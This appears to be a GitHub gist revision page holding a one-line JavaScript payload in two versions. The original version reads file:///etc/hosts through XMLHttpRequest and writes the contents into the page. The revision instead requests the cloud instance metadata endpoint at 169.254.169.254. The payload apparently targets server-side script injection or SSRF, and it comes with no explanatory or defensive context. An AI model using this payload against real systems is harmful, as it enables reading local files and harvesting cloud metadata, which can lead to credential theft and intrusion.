Last active
July 24, 2022 13:30
-
-
Save rv0x00/b6fc7e724461b0c9cf06f31f68b62b8d to your computer and use it in GitHub Desktop.
Revisions
-
rv0x00 revised this gist
Jul 24, 2022 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1 +1 @@ x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’http://169.254.169.254/latest/meta-data/hostname’);x.send(); -
rv0x00 created this gist
Jul 24, 2022 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1 @@ x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’file:///etc/hosts’);x.send();